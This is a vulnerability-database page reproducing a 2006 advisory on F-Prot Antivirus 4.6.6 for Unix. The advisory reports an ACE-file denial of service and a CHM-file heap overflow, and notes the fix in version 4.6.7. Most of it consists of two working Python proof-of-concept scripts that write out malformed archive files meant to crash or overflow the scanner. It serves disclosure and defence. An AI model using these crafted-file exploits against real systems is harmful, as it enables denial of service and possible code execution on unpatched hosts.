Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

fprot-dos.txt

🗓️ 06 Dec 2006 00:00:00Reported by Evgeny LegerovType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

F-Prot Antivirus for Unix: heap overflow and DoS, ACE and CHM file vulnerabilitie

Code
`Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service  
Vendor: http://www.f-prot.com  
Release date: 4 Dec, 2006  
URL: http://gleg.net/fprot.txt  
Author: Evgeny Legerov <[email protected]>  
  
I. DESCRIPTION  
  
Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a  
remote attacker  
to cause a DoS or execute an arbitrary code.  
  
II. DETAILS  
  
1. ACE file Denial of Service  
When parsing a specially crafted ACE compressed file F-Prot Antivirus will enter  
in an infinite loop.  
See fprot1.py for more details.  
  
2. CHM file heap overflow  
When parsing a specially crafted CHM file a heap overflow will occur in F-Prot  
Antivirus.  
See fprot2.py for more details.  
  
III. VENDOR RESPONSE  
  
Update to F-Prot 4.6.7:  
http://www.f-prot.com/news/gen_news/061201_release_unix467.html  
  
IV. EXPLOITS  
  
# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS  
#  
# Copyright (c) 2006 Evgeny Legerov  
#  
# Permission to use, copy, modify, and distribute this software for any  
# purpose with or without fee is hereby granted, provided that the above  
# copyright notice and this permission notice appear in all copies.  
#  
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES  
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF  
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR  
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES  
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN  
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF  
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.  
#  
# To test this code on Linux:  
#  
# create ACE compressed file  
# $ ./fprot1.py > 1.ace  
# $ f-prot 1.ace  
  
import sys  
import struct  
  
ACE="""  
58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14  
02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a  
55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52  
53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff  
00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00  
02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41  
41 41 41 41 41  
"""  
  
s = ""  
for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]:  
s += i  
  
sys.stdout.write(s)  
  
# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap  
# overflow  
#  
# Copyright (c) 2006 Evgeny Legerov  
#  
# Permission to use, copy, modify, and distribute this software for any  
# purpose with or without fee is hereby granted, provided that the above  
# copyright notice and this permission notice appear in all copies.  
#  
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES  
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF  
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR  
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES  
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN  
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF  
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.  
#  
# $ ./fprot2.py > 1.chm  
# $ f-prot 1.chm  
  
import sys  
import struct  
  
s=""  
s+="ITSF" # signature  
s+=struct.pack("<L",3) # version  
s+=struct.pack("<L",96) # header_len  
s+=struct.pack("<L",1) # unknown  
s+=struct.pack("<L",0x41424344) # last_modified  
s+=struct.pack("<L",0x419) # lang_id  
s+="A"*16 #dir_clsid  
s+="B"*16 #stream_clsid  
s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset  
s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len  
s+=struct.pack("<L",120) + "\x00" *4 #dir_offset  
s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len  
s+=struct.pack("<L",4300) + "\x00"*4 #data_offset  
s+="A"*24  
s+="ITSP"  
s+=struct.pack("<L", 1) # version  
s+=struct.pack("<L",0x54) # header_len  
s+=struct.pack("<L", 0xa) # unknown  
s+=struct.pack("<L",1000) # block_len - BUG?  
s+=struct.pack("<L",2) # blockidx  
s+=struct.pack("<L", 1) # index_depth  
s+=struct.pack("<L", -1) # index_root  
s+=struct.pack("<L",0) # index_head  
s+=struct.pack("<L",0) # index_tail  
s+=struct.pack("<L", -1) # unknown2  
s+=struct.pack("<L",1) # num_blocks  
s+=struct.pack("<L", 1033) # lang_id  
s+="A"*32  
s+="B"*10000  
  
sys.stdout.write(s)  
  
V. CREDIT  
  
Discovered by Evgeny Legerov.  
  
The vulnerabilities are part of VulnDisco Pack for CANVAS since Sep, 2006.  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4
f-prot antivirusunixheap overflowdenial of serviceace filechm filevulnerabilitiesremote attackerarbitrary code
20